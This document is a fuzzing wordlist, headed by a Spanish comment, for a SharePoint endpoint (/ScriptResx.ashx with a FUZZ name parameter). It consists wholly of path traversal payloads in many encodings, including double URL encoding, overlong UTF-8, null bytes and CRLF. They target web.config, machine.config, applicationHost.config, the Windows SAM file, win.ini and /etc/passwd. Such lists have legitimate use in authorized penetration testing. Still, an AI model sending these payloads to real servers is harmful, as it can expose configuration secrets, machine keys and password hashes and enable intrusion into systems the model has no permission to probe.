# diccionario para fuzzing de endpoints sharepoints /ScriptResx.ashx?culture=en-us&name=FUZZ
../../../../../web.config
..%2f..%2f..%2f..%2f..%2fweb.config
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/web.config
..%255c..%255c..%255c..%255cweb.config
..%c0%af..%c0%af..%c0%af..%c0%afweb.config
....//....//....//....//web.config
..%u2215..%u2215..%u2215..%u2215web.config
../web.config
..%2fweb.config
..%252fweb.config
%2e%2e%2fweb.config
%2e%2e/web.config
..%5c..%5cweb.config
..%255c..%255cweb.config
..\..\..\web.config
....//....//web.config
..%c0%afweb.config
%c0%ae%c0%ae/web.config
..%25%35%63web.config
..%u2215web.config
..%u2216web.config
../web.config
../machine.config
../applicationHost.config
../global.asax
../Global.asax.cs
../App_Data/
../App_GlobalResources/
../App_WebReferences/
../bin/
../App_Code/
../15/TEMPLATE/LAYOUTS/web.config
../15/CONFIG/web.config
../15/ISAPI/web.config
../../../../../windows/win.ini
../../../../../windows/system32/drivers/etc/hosts
../../../../../windows/system32/cmd.exe
../../../../../windows/system32/config/SAM
../../../../../windows/repair/sam
../../../../../programdata/microsoft/windows/start menu/programs/startup/
../../../../../boot.ini
../../../../../inetpub/logs/logfiles/
../../../../../inetpub/wwwroot/web.config
../web.config%00
..%2fweb.config%00
..%252fweb.config%00
../../../../../windows/win.ini%00
../../../../../etc/passwd%00
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252fwindows%252fwin.ini
..%252f..%252fweb.config
..%25252f..%25252fweb.config
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%77%65%62%2e%63%6f%6e%66%69%67
%2e%2e\%2e%2e\%77%65%62%2e%63%6f%6e%66%69%67
.%0d%0a./web.config
..%0d%0a/web.config
../web%0d%0a.config
../%00/web.config
..%01/web.config
..////%5C../web.config
..././././web.config
.././.././web.config
..//////web.config
..%c0%af..%c0%af..%c0%afweb.config
.%%%2e/.%%%2e/web.config
.$$$./$$$./web.config
..%ef%bc%8fweb.config
..%ef%bc%8f..%ef%bc%8fweb.config
..%c1%1c..%c1%1cweb.config
..%c1%9c..%c1%9cweb.config
..%e0%80%af..%e0%80%afweb.config
..%c0%80..%c0%80web.config
..%uF025web.config
file:///C:/windows/win.ini
file:///windows/win.ini
